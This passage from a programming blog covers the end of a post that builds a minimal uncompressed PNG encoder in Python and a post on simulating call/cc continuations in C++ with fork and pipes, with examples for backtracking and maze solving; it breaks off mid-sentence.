For reference, here is how we'd &quot;encode&quot; this data in the much simpler <a href="http://manpages.ubuntu.com/manpages/oneiric/man5/ppm.5.html">PPM</a> format.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> to_ppm(width, height, data):<br /> <span class="kw">return</span> <span class="st">'P6</span><span class="ch">\n</span><span class="ot">%d</span><span class="st"> </span><span class="ot">%d</span><span class="ch">\n</span><span class="st">255</span><span class="ch">\n</span><span class="ot">%s</span><span class="st">'</span> % (width, height, data)</code></pre><p>I lied when I said we'd use no libraries at all. I will import Python's standard <a href="http://docs.python.org/library/struct.html"><code>struct</code></a> module. I figured an exercise in converting integers to 4-byte <a href="http://en.wikipedia.org/wiki/Endianness">big endian</a> format would be excessively boring. Here's how we do it with <code>struct</code>.</p><pre class="sourceCode"><code class="sourceCode python"><span class="ch">import</span> struct<br /><br /><span class="kw">def</span> be32(n):<br /> <span class="kw">return</span> struct.pack(<span class="st">'&gt;I'</span>, n)</code></pre><p>A PNG file contains a sequence of <a href="http://www.w3.org/TR/PNG/#5Chunk-layout">data chunks</a>, each with an associated length, type, and <a href="http://www.w3.org/TR/PNG/#5CRC-algorithm">CRC checksum</a>. The type is a 4-byte quantity which can be <a href="http://www.w3.org/TR/PNG/#5Chunk-naming-conventions">interpreted</a> as four ASCII letters. 
We'll implement <code>crc</code> later.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> png_chunk(ty, data):<br /> <span class="kw">return</span> be32(<span class="dt">len</span>(data)) + ty + data + be32(crc(ty + data))</code></pre><p>The <a href="http://www.w3.org/TR/PNG/#11IHDR"><code>IHDR</code> chunk</a>, always the first chunk in a file, contains basic header information such as width and height. We will hardcode a color depth of 8 bits, <a href="http://www.w3.org/TR/PNG/#6Colour-values">color type</a> 2 (RGB truecolor), and standard 0 values for the other fields.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> png_header(width, height):<br /> <span class="kw">return</span> png_chunk(<span class="st">'IHDR'</span>,<br /> struct.pack(<span class="st">'&gt;IIBBBBB'</span>, width, height, <span class="dv">8</span>, <span class="dv">2</span>, <span class="dv">0</span>, <span class="dv">0</span>, <span class="dv">0</span>))</code></pre><p>The actual image data is stored in <a href="http://www.ietf.org/rfc/rfc1951.txt">DEFLATE</a> format, the same compression used by <a href="http://en.wikipedia.org/wiki/Gzip">gzip</a> and friends. Fortunately for our minimalist project, DEFLATE allows uncompressed blocks. Each one has a 5-byte header: the byte <code>0</code> (or <code>1</code> for the last block), followed by a 16-bit data length, and then the same length value with all of the bits flipped. Note that these are <em>little-endian</em> numbers, unlike the rest of PNG. 
Never assume a format is internally consistent!</p><pre class="sourceCode"><code class="sourceCode python">MAX_DEFLATE = <span class="bn">0xffff</span><br /><span class="kw">def</span> deflate_block(data, last=<span class="ot">False</span>):<br /> n = <span class="dt">len</span>(data)<br /> <span class="kw">assert</span> n &lt;= MAX_DEFLATE<br /> <span class="kw">return</span> struct.pack(<span class="st">'&lt;BHH'</span>, <span class="dt">bool</span>(last), n, <span class="bn">0xffff</span> ^ n) + data</code></pre><p>Since a DEFLATE block can only hold 64 kB, we'll need to split our image data into multiple blocks. We will actually want a more general function to <a href="http://code.activestate.com/recipes/496784-split-string-into-n-size-pieces/">split a sequence</a> into chunks of size <code>n</code> (allowing the last chunk to be smaller than <code>n</code>).</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> pieces(seq, n):<br /> <span class="kw">return</span> [seq[i:i+n] <span class="kw">for</span> i in <span class="dt">xrange</span>(<span class="dv">0</span>, <span class="dt">len</span>(seq), n)]</code></pre><p>PNG wants the DEFLATE blocks to be encapsulated as a <a href="http://www.ietf.org/rfc/rfc1950.txt">zlib data stream</a>. For our purposes, this means we prefix a header of <code>78 01</code> hex, and suffix an <a href="http://en.wikipedia.org/wiki/Adler-32">Adler-32 checksum</a> of the &quot;decompressed&quot; data. 
That's right, a self-contained PNG encoder needs to implement <em>two different</em> checksum algorithms.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> zlib_stream(data):<br /> segments = pieces(data, MAX_DEFLATE)<br /><br /> blocks = <span class="st">''</span>.join(deflate_block(p) <span class="kw">for</span> p in segments[:-<span class="dv">1</span>])<br /> blocks += deflate_block(segments[-<span class="dv">1</span>], last=<span class="ot">True</span>)<br /><br /> <span class="kw">return</span> <span class="st">'</span><span class="ch">\x78\x01</span><span class="st">'</span> + blocks + be32(adler32(data))</code></pre><p>We're almost done, but there's one more wrinkle. PNG has a pre-compression <a href="http://www.w3.org/TR/PNG/#9Filters">filter</a> step, which transforms a scanline of data at a time. A filter doesn't change the size of the image data, but is supposed to expose redundancies, leading to better compression. We aren't compressing anyway, so we choose the no-op filter. This means we prefix a zero byte to each scanline.</p><p>At last we can build the PNG file. 
It consists of the <a href="http://www.w3.org/TR/PNG/#5PNG-file-signature">magic PNG signature</a>, a header chunk, our zlib stream inside an <a href="http://www.w3.org/TR/PNG/#11IDAT"><code>IDAT</code> chunk</a>, and an empty <a href="http://www.w3.org/TR/PNG/#11IEND"><code>IEND</code> chunk</a> to mark the end of the file.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> to_png(width, height, data):<br /> lines = <span class="st">''</span>.join(<span class="st">'\0'</span>+p <span class="kw">for</span> p in pieces(data, <span class="dv">3</span>*width))<br /><br /> <span class="kw">return</span> (<span class="st">'</span><span class="ch">\x89</span><span class="st">PNG</span><span class="ch">\r\n\x1a\n</span><span class="st">'</span><br /> + png_header(width, height)<br /> + png_chunk(<span class="st">'IDAT'</span>, zlib_stream(lines))<br /> + png_chunk(<span class="st">'IEND'</span>, <span class="st">''</span>))</code></pre><p>Actually, a PNG file may contain any number of <code>IDAT</code> chunks. The zlib stream is given by the concatenation of their contents. It might be convenient to emit one <code>IDAT</code> chunk per DEFLATE block. But the <code>IDAT</code> boundaries really <a href="http://www.w3.org/TR/PNG/#10CompressionFSL">can</a> occur anywhere, even halfway through the zlib checksum. This flexibility is convenient for encoders, and a hassle for decoders. For example, one of <a href="http://en.wikipedia.org/wiki/Portable_Network_Graphics#Web_browser_support_for_PNG">many historical PNG bugs</a> in Internet Explorer is triggered by <a href="http://support.microsoft.com/kb/897242">empty <code>IDAT</code> chunks</a>.</p><p>Here are those checksum algorithms we need. My CRC function follows the approach of <a href="http://en.wikipedia.org/wiki/Computation_of_CRC#Bit_ordering_.28Endianness.29">code fragment 5</a> from Wikipedia. 
For better performance you would want to precompute a lookup table, as <a href="http://www.w3.org/TR/PNG/#D-CRCAppendix">suggested</a> by the PNG spec.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> crc(data):<br /> c = <span class="bn">0xffffffff</span><br /> <span class="kw">for</span> x in data:<br /> c ^= <span class="dt">ord</span>(x)<br /> <span class="kw">for</span> k in <span class="dt">xrange</span>(<span class="dv">8</span>):<br /> v = <span class="bn">0xedb88320</span> <span class="kw">if</span> c &amp; <span class="dv">1</span> <span class="kw">else</span> <span class="dv">0</span><br /> c = v ^ (c &gt;&gt; <span class="dv">1</span>)<br /> <span class="kw">return</span> c ^ <span class="bn">0xffffffff</span><br /><br /><span class="kw">def</span> adler32(data):<br /> s1, s2 = <span class="dv">1</span>, <span class="dv">0</span><br /> <span class="kw">for</span> x in data:<br /> s1 = (s1 + <span class="dt">ord</span>(x)) % <span class="dv">65521</span><br /> s2 = (s2 + s1) % <span class="dv">65521</span><br /> <span class="kw">return</span> (s2 &lt;&lt; <span class="dv">16</span>) + s1</code></pre><p>Now we can test this code. 
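Before the test, an aside on that lookup-table suggestion: here is a sketch of the table-driven variant (my addition, written for Python 3, where iterating over <code>bytes</code> yields integers, so there's no <code>ord()</code> as in the post's Python 2 code):

```python
# Table-driven CRC-32.  The 256-entry table precomputes the effect of the
# inner eight-step bit loop, so the per-byte work becomes a single lookup.
def make_crc_table():
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (0xedb88320 ^ (c >> 1)) if c & 1 else c >> 1
        table.append(c)
    return table

CRC_TABLE = make_crc_table()

def crc(data):
    c = 0xffffffff
    for x in data:
        c = CRC_TABLE[(c ^ x) & 0xff] ^ (c >> 8)
    return c ^ 0xffffffff
```

This computes the same reflected CRC-32 as the bitwise loop above; for example, <code>crc(b"IEND")</code> gives <code>0xAE426082</code>, the checksum you'll find at the end of every PNG file's empty <code>IEND</code> chunk.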
We'll generate a grid of red-green-yellow gradients, and write it in both PPM and PNG formats.</p><pre class="sourceCode"><code class="sourceCode python">w, h = <span class="dv">500</span>, <span class="dv">300</span><br />img = <span class="st">''</span><br /><span class="kw">for</span> y in <span class="dt">xrange</span>(h):<br /> <span class="kw">for</span> x in <span class="dt">xrange</span>(w):<br /> img += <span class="dt">chr</span>(x % <span class="dv">256</span>) + <span class="dt">chr</span>(y % <span class="dv">256</span>) + <span class="st">'\0'</span><br /><br /><span class="dt">open</span>(<span class="st">'out.ppm'</span>, <span class="st">'wb'</span>).write(to_ppm(w, h, img))<br /><span class="dt">open</span>(<span class="st">'out.png'</span>, <span class="st">'wb'</span>).write(to_png(w, h, img))</code></pre><p>Then we can verify that the two files contain identical image data.</p><pre><code>$ pngtopnm out.png | sha1sum - out.ppm<br />e19c1229221c608b2a45a4488f9959403b8630a0 -<br />e19c1229221c608b2a45a4488f9959403b8630a0 out.ppm<br /></code></pre><p>That's it! As usual, the code is on <a href="https://github.com/kmcallister/blog-misc/tree/master/minpng/minpng.py">GitHub</a>. 
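One more sanity check (my addition, restating the post's stream-building helpers in Python 3 <code>bytes</code> and borrowing <code>zlib.adler32</code> for the trailer): the standard <code>zlib</code> module will happily decompress the hand-assembled stream, which confirms the stored-block headers and checksum are right.

```python
import struct
import zlib

MAX_DEFLATE = 0xffff

def be32(n):
    return struct.pack('>I', n)

def deflate_block(data, last=False):
    # Stored (uncompressed) DEFLATE block: flag byte, then little-endian
    # length and its one's complement.
    n = len(data)
    assert n <= MAX_DEFLATE
    return struct.pack('<BHH', bool(last), n, 0xffff ^ n) + data

def pieces(seq, n):
    return [seq[i:i+n] for i in range(0, len(seq), n)]

def zlib_stream(data):
    segments = pieces(data, MAX_DEFLATE)
    blocks = b''.join(deflate_block(p) for p in segments[:-1])
    blocks += deflate_block(segments[-1], last=True)
    # 78 01 header, then the blocks, then the Adler-32 of the raw data.
    return b'\x78\x01' + blocks + be32(zlib.adler32(data) & 0xffffffff)

payload = bytes(range(256)) * 1024   # 256 kB, so we exercise multiple blocks
assert zlib.decompress(zlib_stream(payload)) == payload
```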
You can also read what others have written on similar subjects <a href="http://drj11.wordpress.com/2007/11/20/a-use-for-uncompressed-pngs/">here</a>, <a href="https://github.com/jrmuizel/minpng">here</a>, <a href="http://gareth-rees.livejournal.com/9988.html">here</a>, or <a href="http://www.chrfr.de/software/midp_png.html">here</a>.</p><p><em><a href="http://mainisusuallyafunction.blogspot.com/2012/04/minimal-encoder-for-uncompressed-pngs.html">Permalink</a> | posted by keegan | 2 comments</em></p><h1>Continuations in C++ with fork</h1><p><em>Tue, 14 Feb 2012 (updated Jan 2015) | tags: code, continuations, cxx, donttrythisathome</em></p><p>[Update, Jan 2015: I've <a href="https://github.com/kmcallister/forkallcc">translated this code into Rust</a>.]</p><p>While reading &quot;<a href="http://homepage.mac.com/sigfpe/Computing/continuations.html">Continuations in C</a>&quot; I came across an intriguing idea:</p><blockquote><p>It is possible to simulate <code>call/cc</code>, or something like it, on Unix systems with system calls like <code>fork()</code> that literally duplicate the running process.</p></blockquote><p>The author sets this idea aside, and instead discusses some code that uses <a href="http://www.kernel.org/doc/man-pages/online/pages/man3/setjmp.3.html"><code>setjmp</code></a>/<a href="http://www.kernel.org/doc/man-pages/online/pages/man3/longjmp.3.html"><code>longjmp</code></a> and stack copying. And there are several other <a href="http://en.wikipedia.org/wiki/Continuation">continuation</a>-like constructs available for C, such as POSIX <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/getcontext.2.html"><code>getcontext</code></a>. But the idea of implementing <a href="http://en.wikipedia.org/wiki/Call-with-current-continuation"><code>call/cc</code></a> with <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/fork.2.html"><code>fork</code></a> stuck with me, if only for its amusement value. 
I'd seen <code>fork</code> used for <a href="http://okmij.org/ftp/continuations/shift-v-fork.html#implementation-C">computing with probability distributions</a>, but I couldn't find an implementation of <code>call/cc</code> itself. So I decided to give it a shot, using my favorite <a href="http://esoteric.voxelperfect.net/wiki/Main_Page">esolang</a>, C++.</p> <p>Continuations are a famously mind-bending idea, and this article doesn't totally explain what they are or what they're good for. If you aren't familiar with continuations, you might catch on from the examples, or you might want to consult another source first (<a href="http://en.wikipedia.org/wiki/Continuation">1</a>, <a href="http://www.madore.org/~david/computers/callcc.html">2</a>, <a href="http://community.schemewiki.org/?call-with-current-continuation">3</a>, <a href="http://community.schemewiki.org/?call-with-current-continuation-for-C-programmers">4</a>, <a href="http://www.ps.uni-saarland.de/~duchier/python/continuations.html">5</a>, <a href="http://web.mit.edu/alexmv/6.S184/l7-continuations.pdf">6</a>).</p><h1 id="small-examples">Small examples</h1><p>I'll get to the implementation later, but right now let's see what these <code>fork</code>-based continuations can do. The interface looks like this.</p> <pre class="sourceCode"><code class="sourceCode cpp"><span class="kw">template</span> &lt;<span class="kw">typename</span> T&gt;<br /><span class="kw">class</span> cont {<br /><span class="kw">public</span>:<br /> <span class="dt">void</span> <span class="kw">operator</span>()(<span class="dt">const</span> T &amp;x);<br />};<br /><br /><span class="kw">template</span> &lt;<span class="kw">typename</span> T&gt;<br />T call_cc( std::function&lt; T (cont&lt;T&gt;) &gt; f );</code></pre> <p><a href="http://en.cppreference.com/w/cpp/utility/functional/function"><code>std::function</code></a> is a wrapper that can hold function-like values, such as function objects or C-style function pointers. 
So <code>call_cc&lt;T&gt;</code> will accept any function-like value that takes an argument of type <code>cont&lt;T&gt;</code> and returns a value of type <code>T</code>. This wrapper is the first of several <a href="http://en.wikipedia.org/wiki/C%2B%2B11">C++11</a> features we'll use.</p> <p><code>call_cc</code> stands for &quot;call with current continuation&quot;, and that's exactly what it does. <code>call_cc(f)</code> will call <code>f</code>, and return whatever <code>f</code> returns. The interesting part is that it passes to <code>f</code> an instance of our <code>cont</code> class, which represents all the stuff that's going to happen in the program after <code>f</code> returns. That <code>cont</code> object overloads <code>operator()</code> and so can be called like a function. If it's called with some argument <code>x</code>, the program behaves as though <code>f</code> had returned <code>x</code>.</p> <p>The types reflect this usage. The type parameter <code>T</code> in <code>cont&lt;T&gt;</code> is the return type of the function passed to <code>call_cc</code>. It's also the type of values accepted by <code>cont&lt;T&gt;::operator()</code>.</p><p>Here's a small example.</p> <pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">int</span> f(cont&lt;<span class="dt">int</span>&gt; k) {<br /> std::cout &lt;&lt; <span class="st">&quot;f called&quot;</span> &lt;&lt; std::endl;<br /> k(<span class="dv">1</span>);<br /> std::cout &lt;&lt; <span class="st">&quot;k returns&quot;</span> &lt;&lt; std::endl;<br /> <span class="kw">return</span> <span class="dv">0</span>;<br />}<br /><br /><span class="dt">int</span> main() {<br /> std::cout &lt;&lt; <span class="st">&quot;f returns &quot;</span> &lt;&lt; call_cc&lt;<span class="dt">int</span>&gt;(f) &lt;&lt; std::endl;<br />}</code></pre> <p>When we run this code we get:</p><pre><code>f called<br />f returns 1<br /></code></pre><p>We don't see the &quot;<code>k returns</code>&quot; message. 
Instead, calling <code>k(1)</code> bails out of <code>f</code> early, and forces it to return 1. This would happen even if we passed <code>k</code> to some deeply nested function call, and invoked it there.</p> <p>This nonlocal return is kind of like throwing an exception, and is not that surprising. More exciting things happen if a continuation outlives the function call it came from.</p><pre class="sourceCode"><code class="sourceCode cpp">boost::optional&lt; cont&lt;<span class="dt">int</span>&gt; &gt; global_k;<br /><br /><span class="dt">int</span> g(cont&lt;<span class="dt">int</span>&gt; k) {<br /> std::cout &lt;&lt; <span class="st">&quot;g called&quot;</span> &lt;&lt; std::endl;<br /> global_k = k;<br /> <span class="kw">return</span> <span class="dv">0</span>;<br />}<br /><br /><span class="dt">int</span> main() {<br /> std::cout &lt;&lt; <span class="st">&quot;g returns &quot;</span> &lt;&lt; call_cc&lt;<span class="dt">int</span>&gt;(g) &lt;&lt; std::endl;<br /><br /> <span class="kw">if</span> (global_k)<br /> (*global_k)(<span class="dv">1</span>);<br />}</code></pre> <p>When we run this, we get:</p><pre><code>g called<br />g returns 0<br />g returns 1<br /></code></pre><p><code>g</code> is called once, and returns twice! When called, <code>g</code> saves the current continuation in a global variable. After <code>g</code> returns, <code>main</code> calls that continuation, and <code>g</code> returns again with a different value.</p> <p>What value should <code>global_k</code> have before <code>g</code> is called? There's no such thing as a &quot;default&quot; or &quot;uninitialized&quot; <code>cont&lt;T&gt;</code>. We solve this problem by wrapping it with <a href="http://www.boost.org/libs/optional/index.html"><code>boost::optional</code></a>. We use the resulting object much like a pointer, checking for &quot;null&quot; and then dereferencing. 
The difference is that <code>boost::optional</code> manages storage for the underlying value, if any.</p> <p>Why isn't this code an infinite loop? Because <strong>invoking a <code>cont&lt;T&gt;</code> also resets global state</strong> to the values it had when the continuation was captured. The second time <code>g</code> returns, <code>global_k</code> has been reset to the &quot;null&quot; <code>optional</code> value. This is <strong>unlike Scheme's <code>call/cc</code> and most other continuation systems</strong>. It turns out to be a serious limitation, though it's sometimes convenient. The reason for this behavior is that invoking a continuation is implemented as a transfer of control to another process. More on that later.</p> <h1 id="backtracking">Backtracking</h1><p>We can use continuations to implement backtracking, as found in <a href="http://en.wikipedia.org/wiki/Logic_programming">logic programming</a> languages. Here is a suitable interface.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">bool</span> guess();<br /><span class="dt">void</span> fail();</code></pre><p>We will use <code>guess</code> as though it has a magical ability to predict the future. We assume it will only return <code>true</code> if doing so results in a program that never calls <code>fail</code>. 
Here is the implementation.</p> <pre class="sourceCode"><code class="sourceCode cpp">boost::optional&lt; cont&lt;<span class="dt">bool</span>&gt; &gt; checkpoint;<br /><br /><span class="dt">bool</span> guess() {<br /> <span class="kw">return</span> call_cc&lt;<span class="dt">bool</span>&gt;( [](cont&lt;<span class="dt">bool</span>&gt; k) {<br /> checkpoint = k;<br /> <span class="kw">return</span> <span class="kw">true</span>;<br /> } );<br />}<br /><br /><span class="dt">void</span> fail() {<br /> <span class="kw">if</span> (checkpoint) {<br /> (*checkpoint)(<span class="kw">false</span>);<br /> } <span class="kw">else</span> {<br /> std::cerr &lt;&lt; <span class="st">&quot;Nothing to be done.&quot;</span> &lt;&lt; std::endl;<br /> exit(<span class="dv">1</span>);<br /> }<br />}</code></pre> <p><code>guess</code> invokes <code>call_cc</code> on a <a href="http://en.wikipedia.org/wiki/Anonymous_function#C.2B.2B">lambda expression</a>, which saves the current continuation and returns <code>true</code>. A subsequent call to <code>fail</code> will invoke this continuation, retrying execution in a world where <code>guess</code> had returned <code>false</code> instead. In Scheme et al, we would store a whole stack of continuations. 
But invoking our <code>cont&lt;bool&gt;</code> resets global state, including the <code>checkpoint</code> variable itself, so we only need to explicitly track the most recent continuation.</p> <p>Now we can implement the integer factoring example from &quot;<a href="http://homepage.mac.com/sigfpe/Computing/continuations.html">Continuations in C</a>&quot;.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">int</span> integer(<span class="dt">int</span> m, <span class="dt">int</span> n) {<br /> <span class="kw">for</span> (<span class="dt">int</span> i=m; i&lt;=n; i++) {<br /> <span class="kw">if</span> (guess())<br /> <span class="kw">return</span> i;<br /> }<br /> fail();<br />}<br /><br /><span class="dt">void</span> factor(<span class="dt">int</span> n) {<br /> <span class="dt">const</span> <span class="dt">int</span> i = integer(<span class="dv">2</span>, <span class="dv">100</span>);<br /> <span class="dt">const</span> <span class="dt">int</span> j = integer(<span class="dv">2</span>, <span class="dv">100</span>);<br /><br /> <span class="kw">if</span> (i*j != n)<br /> fail();<br /><br /> std::cout &lt;&lt; i &lt;&lt; <span class="st">&quot; * &quot;</span> &lt;&lt; j &lt;&lt; <span class="st">&quot; = &quot;</span> &lt;&lt; n &lt;&lt; std::endl;<br />}</code></pre> <p><code>factor(n)</code> will guess two integers, and fail if their product is not <code>n</code>. Calling <code>factor(391)</code> will produce the output</p><pre><code>17 * 23 = 391<br /></code></pre><p>after a moment's delay. 
In fact, you might see this <em>after</em> your shell prompt has returned, because the output is produced by a thousand-generation descendant of the process your shell created.</p><h1 id="solving-a-maze">Solving a maze</h1> <p>For a more substantial use of backtracking, let's solve a maze.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">const</span> <span class="dt">int</span> maze_size = <span class="dv">15</span>;<br /><span class="dt">char</span> maze[] =<br /> <span class="st">&quot;X-------------+</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot; | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;|--+ | | | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | | --+ |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;|-+---+--+- | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | ---+-+- |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| +-+-+--| |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | |--- |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;|--- -+-------|</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| </span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;+------------- </span><span 
class="ch">\n</span><span class="st">&quot;</span>;<br /><br /><span class="dt">void</span> solve_maze() {<br /> <span class="dt">int</span> x=<span class="dv">0</span>, y=<span class="dv">0</span>;<br /><br /> <span class="kw">while</span> ((x != maze_size<span class="dv">-1</span>)<br /> || (y != maze_size<span class="dv">-1</span>)) {<br /><br /> <span class="kw">if</span> (guess()) x++;<br /> <span class="kw">else</span> <span class="kw">if</span> (guess()) x--;<br /> <span class="kw">else</span> <span class="kw">if</span> (guess()) y++;<br /> <span class="kw">else</span> y--;<br /><br /> <span class="kw">if</span> ( (x &lt; <span class="dv">0</span>) || (x &gt;= maze_size) ||<br /> (y &lt; <span class="dv">0</span>) || (y &gt;= maze_size) )<br /> fail();<br /><br /> <span class="dt">const</span> <span class="dt">int</span> i = y*(maze_size<span class="dv">+1</span>) + x;<br /> <span class="kw">if</span> (maze[i] != ' ')<br /> fail();<br /> maze[i] = 'X';<br /> }<br /><br /> <span class="kw">for</span> (<span class="dt">char</span> c : maze) {<br /> <span class="kw">if</span> (c == 'X')<br /> std::cout &lt;&lt; <span class="st">&quot;</span><span class="ch">\e</span><span class="st">[1;32mX</span><span class="ch">\e</span><span class="st">[0m&quot;</span>;<br /> <span class="kw">else</span><br /> std::cout &lt;&lt; c;<br /> }<br />}</code></pre> <p>Whether code or prose, the algorithm is pretty simple. Start at the upper-left corner. As long as we haven't reached the lower-right corner, guess a direction to move. 
Fail if we go off the edge, run into a wall, or find ourselves on a square we already visited.</p><p>Once we've reached the goal, we <a href="http://en.wikipedia.org/wiki/C%2B%2B11#Range-based_for-loop">iterate</a> over the <code>char</code> array and print it out with some rad <a href="http://pueblo.sourceforge.net/doc/manual/ansi_color_codes.html">ANSI color codes</a>.</p><p>Once again, we're making good use of the fact that our continuations reset global state. That's why we see <code>'X'</code> marks not on the failed detours, but only on a successful path through the maze. Here's what it looks like.</p> <p><pre><code class="sourceCode"><br /><span class="kw">X</span>-------------+<br /><span class="kw">XXXXXXXX</span>| |<br />|--+ |<span class="kw">X</span>| | |<br />| | |<span class="kw">X</span>| --+ |<br />| |<span class="kw">XXXXX</span>| |<br />|-+---+--+-<span class="kw">X</span>| |<br />| |<span class="kw">XXX</span> | <span class="kw">XXX</span>|<br />| |<span class="kw">X</span>|<span class="kw">X</span>---+-+-<span class="kw">X</span>|<br />|<span class="kw">XXX</span>|<span class="kw">XXXXXX</span>|<span class="kw">XX</span>|<br />|<span class="kw">X</span>+-+-+--|<span class="kw">XXX</span> |<br />|<span class="kw">X</span>| | |--- |<br />|<span class="kw">XXXX</span> | |<br />|---<span class="kw">X</span>-+-------|<br />| <span class="kw">XXXXXXXXXXX</span><br />+-------------<span class="kw">X</span><br /></code></pre></p> <h1 id="excess-backtracking">Excess backtracking</h1><p>We can run both examples in a single program.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">int</span> main() {<br /> factor(<span class="dv">391</span>);<br /> solve_maze();<br />}</code></pre> <p>If we change the maze to be unsolvable, we'll get:</p><pre><code>17 * 23 = 391<br />23 * 17 = 391<br />Nothing to be done.<br /></code></pre><p>Factoring 391 a different way won't change the maze layout, but the program doesn't know that. 
We can add a <a href="http://en.wikipedia.org/wiki/Cut_%28logic_programming%29">cut</a> primitive to eliminate unwanted backtracking.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">void</span> cut() {<br /> checkpoint = boost::none;<br />}<br /><br /><span class="dt">int</span> main() {<br /> factor(<span class="dv">391</span>);<br /> cut();<br /> solve_maze();<br />}</code></pre><p></p> <h1 id="the-implementation">The implementation</h1><p>For such a crazy idea, the code to implement <code>call_cc</code> with <code>fork</code> is actually pretty reasonable. Here's the core of it.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="kw">template</span> &lt;<span class="kw">typename</span> T&gt;<br /><span class="co">// static</span><br />T cont&lt;T&gt;::call_cc(call_cc_arg f) {<br /> <span class="dt">int</span> fd[<span class="dv">2</span>];<br /> pipe(fd);<br /> <span class="dt">int</span> read_fd = fd[<span class="dv">0</span>];<br /> <span class="dt">int</span> write_fd = fd[<span class="dv">1</span>];<br /><br /> <span class="kw">if</span> (fork()) {<br /> <span class="co">// parent</span><br /> close(read_fd);<br /> <span class="kw">return</span> f( cont&lt;T&gt;(write_fd) );<br /> } <span class="kw">else</span> {<br /> <span class="co">// child</span><br /> close(write_fd);<br /> <span class="dt">char</span> buf[<span class="kw">sizeof</span>(T)];<br /> <span class="kw">if</span> (read(read_fd, buf, <span class="kw">sizeof</span>(T)) &lt; ssize_t(<span class="kw">sizeof</span>(T)))<br /> exit(<span class="dv">0</span>);<br /> close(read_fd);<br /> <span class="kw">return</span> *<span class="kw">reinterpret_cast</span>&lt;T*&gt;(buf);<br /> }<br />}<br /><br /><span class="kw">template</span> &lt;<span class="kw">typename</span> T&gt;<br /><span class="dt">void</span> cont&lt;T&gt;::impl::invoke(<span class="dt">const</span> T &amp;x) {<br /> write(m_pipe, &amp;x, <span class="kw">sizeof</span>(T));<br /> exit(<span 
class="dv">0</span>);<br />}</code></pre> <p>To capture a continuation, we fork the process. The resulting processes share a <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/pipe.2.html">pipe</a> which was created before the fork. The parent process will call <code>f</code> immediately, passing a <code>cont&lt;T&gt;</code> object that holds onto the write end of this pipe. If that continuation is invoked with some argument <code>x</code>, the parent process will send <code>x</code> down the pipe and then exit. The child process wakes up from its <code>read</code> call, and returns <code>x</code> from <code>call_cc</code>.</p> <p>There are a few more implementation details.</p><ul class="incremental"><li><p>If the parent process exits, it will close the write end of the pipe, and the child's <code>read</code> will return 0, i.e. end-of-file. This prevents a buildup of unused continuation processes. But what if the parent deletes the last copy of some <code>cont&lt;T&gt;</code>, yet keeps running? We'd like to kill the corresponding child process immediately.</p><p>This sounds like a use for a reference-counted smart pointer, but we want to hide this detail from the user. So we split off a private implementation class, <code>cont&lt;T&gt;::impl</code>, with a destructor that calls <code>close</code>. The user-facing class <code>cont&lt;T&gt;</code> holds a <a href="http://en.cppreference.com/w/cpp/memory/shared_ptr"><code>std::shared_ptr</code></a> to a <code>cont&lt;T&gt;::impl</code>. And <code>cont&lt;T&gt;::operator()</code> simply calls <code>cont&lt;T&gt;::impl::invoke</code> through this pointer.</p></li> <li><p>It would be nice to tell the compiler that <code>cont&lt;T&gt;::operator()</code> won't return, to avoid warnings like &quot;control reaches end of non-void function&quot;. 
GCC provides the <a href="http://gcc.gnu.org/onlinedocs/gcc/Function-Attributes.html#index-g_t_0040code_007bnoreturn_007d-function-attribute-2543"><code>noreturn</code> attribute</a> for this purpose.</p></li><li><p>We want the <code>cont&lt;T&gt;</code> constructor to be private, so we had to make <code>call_cc</code> a static member function of that class. But the examples above use a free function <code>call_cc&lt;T&gt;</code>. It's easiest to implement the latter as a 1-line function that calls the former. The alternative is to make it a <a href="http://www.parashift.com/c++-faq-lite/friends.html">friend</a> function of <code>cont&lt;T&gt;</code>, which requires some forward declarations and other noise.</p></li> </ul><p>There are a number of limitations too.</p><ul class="incremental"><li><p>As noted, the forked child process doesn't see changes to the parent's global state. This precludes some interesting uses of continuations, like implementing <a href="http://en.wikipedia.org/wiki/Continuation#Coroutines">coroutines</a>. In fact, I had trouble coming up with any application other than backtracking. You could work around this limitation with <a href="http://www.boost.org/doc/libs/1_48_0/doc/html/interprocess/quick_guide.html">shared memory</a>, but it seemed like too much hassle.</p></li><li><p>Each captured continuation can only be invoked once. This is easiest to observe if the code using continuations also invokes <code>fork</code> directly. It could possibly be fixed with additional <code>fork</code>ing inside <code>call_cc</code>.</p></li> <li><p>Calling a continuation sends the argument through a pipe using a naive byte-for-byte copy. So the argument needs to be <a href="http://www.fnal.gov/docs/working-groups/fpcltf/Pkg/ISOcxx/doc/POD.html">Plain Old Data</a>, and had better not 